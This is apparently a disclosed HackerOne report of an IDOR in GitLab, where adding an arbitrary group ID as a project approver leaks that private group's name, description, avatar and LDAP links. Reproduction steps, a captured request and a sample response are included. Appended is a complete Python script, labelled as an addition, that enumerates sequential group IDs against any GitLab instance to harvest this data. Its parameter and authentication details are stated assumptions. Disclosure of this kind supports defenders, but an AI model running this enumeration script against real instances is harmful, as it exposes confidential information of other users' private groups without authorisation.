Project group approvers setting leaks private group names, avatars, LDAP settings, and description
Link: https://hackerone.com/reports/375116
By: @jobert
Details: There is an IDOR vulnerability that allows anyone to obtain the name, description, avatar, and LDAP configuration of a private group on a GitLab instance. This is currently exploitable on gitlab.com. To reproduce, follow the steps below.
Victim
- Sign in as a normal user
- Create a private group
- Grab the group's ID, which can be found in the HTML source on the group page
Attacker
- Sign in as a new user that can create projects
- Create a new group
- Create a new project and go to its Settings, expand Merge request settings
- Intercept your network traffic
- Add the group you created in the attacker's step 2 as a group approver
When the group is added as an approver, a request similar to the one below will be submitted:
Request
POST /:namespace/:project-name HTTP/1.1
Host: gitlab-instance
...
----------1442112407
Content-Disposition: form-data; name="_method"
PATCH
----------1442112407
Content-Disposition: form-data; name="project[approver_group_ids]"
1
----------1442112407--
The server will respond with a 302 Found response in case the approvers were saved. Now, repeat the request, but this time, replace the value of project[approver_group_ids]
with the group ID that was obtained in step 3 of the victim's steps. Since group IDs are auto-incrementing integers, an attacker can enumerate them easily.
To obtain the information about the group, request the /api/v4/projects/:namespace%2f:project-name/approvers
endpoint of the attacker's own project, which will respond with basic details about the group:
Response
{
  "approvers": [],
  "approver_groups": [
    {
      "group": {
        "id": 2,
        "web_url": "https://gitlab-instance/:namespace",
        "name": "hidden-group",
        "path": "hidden-group",
        "description": "This may contain confidential information.",
        "visibility": "private",
        "lfs_enabled": true,
        "avatar_url": null,
        "request_access_enabled": false,
        "full_name": "hidden-group",
        "full_path": "hidden-group",
        "parent_id": null,
        "ldap_cn": "a",
        "ldap_access": 10,
        "ldap_group_links": [
          {
            "cn": "a",
            "group_access": 10,
            "provider": "admin"
          },
          {
            "cn": "1",
            "group_access": 50,
            "provider": "admin"
          }
        ]
      }
    }
  ],
  "approvals_before_merge": 0,
  "reset_approvals_on_push": true,
  "disable_overriding_approvers_per_merge_request": null
}
This vulnerability can also be exploited by sending a PUT request to the GitLab API /api/v4/projects/:namespace%2f:hidden-name/approvers endpoint (declared in ee/lib/api/project_approvals.rb).
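The steps above, as an added example that is not part of the original report: a Python script that sets a candidate group ID as an approver group on a project the attacker controls via the PUT API endpoint named above, reads back the approvers endpoint, and extracts the fields a private group should not disclose. It assumes personal-access-token authentication (PRIVATE-TOKEN header) and that the PUT endpoint accepts a parameter named approver_group_ids, the name taken from the form field in the intercepted request; both are assumptions, not details confirmed by the report. The sample response is constructed to mirror the one shown above so the parsing can be checked offline.

```python
"""Hypothetical reproduction script (not part of the report or of GitLab).

Probes group IDs through the attacker's own project: PUT the ID as an
approver group, GET the approvers endpoint, and collect what the response
reveals about the (private) group. Assumed: PRIVATE-TOKEN auth and a PUT
parameter named approver_group_ids.
"""
import json
import urllib.error
import urllib.parse
import urllib.request


def project_api_path(namespace, project):
    """Build /api/v4/projects/:id with 'namespace/project' URL-encoded as a
    single path segment (the %2f form used in the report)."""
    encoded = urllib.parse.quote(f"{namespace}/{project}", safe="")
    return f"/api/v4/projects/{encoded}"


def extract_group_leak(approvers_json):
    """Pull the private-group fields out of an approvers response.

    Returns one dict per approver group, holding the fields a non-member
    should never see: name, path, description, avatar and LDAP links."""
    leaked = []
    for entry in approvers_json.get("approver_groups", []):
        group = entry.get("group", {})
        leaked.append({
            "id": group.get("id"),
            "name": group.get("name"),
            "full_path": group.get("full_path"),
            "description": group.get("description"),
            "visibility": group.get("visibility"),
            "avatar_url": group.get("avatar_url"),
            "ldap_group_links": [
                (link.get("cn"), link.get("group_access"), link.get("provider"))
                for link in group.get("ldap_group_links") or []
            ],
        })
    return leaked


def _api(base_url, token, path, method="GET", data=None):
    """Minimal GitLab API call; PRIVATE-TOKEN auth is an assumption."""
    body = urllib.parse.urlencode(data).encode() if data else None
    req = urllib.request.Request(base_url + path, data=body, method=method,
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.status, json.loads(resp.read() or b"null")


def probe_group(base_url, token, namespace, project, group_id):
    """Set group_id as an approver group on the attacker's project, then read
    the approvers endpoint. Returns the leaked data, or None when the server
    rejects the ID (for example because no such group exists)."""
    path = project_api_path(namespace, project) + "/approvers"
    try:
        # Parameter name assumed from the form field in the report's request.
        _api(base_url, token, path, method="PUT",
             data={"approver_group_ids": str(group_id)})
    except urllib.error.HTTPError:
        return None
    _, body = _api(base_url, token, path)
    return extract_group_leak(body)


def enumerate_groups(base_url, token, namespace, project, first_id, last_id):
    """Walk a bounded range of auto-incrementing group IDs and map each ID to
    what it revealed. Only IDs that yielded data are kept."""
    findings = {}
    for gid in range(first_id, last_id + 1):
        leak = probe_group(base_url, token, namespace, project, gid)
        if leak:
            findings[gid] = leak
    return findings


# Constructed sample shaped like the response shown in the report, used to
# check extract_group_leak() without a live instance.
SAMPLE_RESPONSE = {
    "approvers": [],
    "approver_groups": [{"group": {
        "id": 2, "name": "hidden-group", "path": "hidden-group",
        "full_path": "hidden-group",
        "description": "This may contain confidential information.",
        "visibility": "private", "avatar_url": None,
        "ldap_group_links": [
            {"cn": "a", "group_access": 10, "provider": "admin"},
            {"cn": "1", "group_access": 50, "provider": "admin"},
        ],
    }}],
    "approvals_before_merge": 0,
}


if __name__ == "__main__":
    import sys
    base, tok, ns, proj, lo, hi = sys.argv[1:7]
    for gid, groups in enumerate_groups(base, tok, ns, proj,
                                        int(lo), int(hi)).items():
        for g in groups:
            print(gid, g["full_path"], g["visibility"], g["ldap_group_links"])
```

Usage: python probe.py https://gitlab-instance TOKEN attacker-namespace attacker-project 1 200. The range is bounded on purpose; because IDs are sequential, the cost of a full sweep is one PUT and one GET per ID, which is also what a defender should look for in logs (a single project whose approver-group setting changes many times in quick succession).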
Impact
Information of private groups is supposed to remain confidential.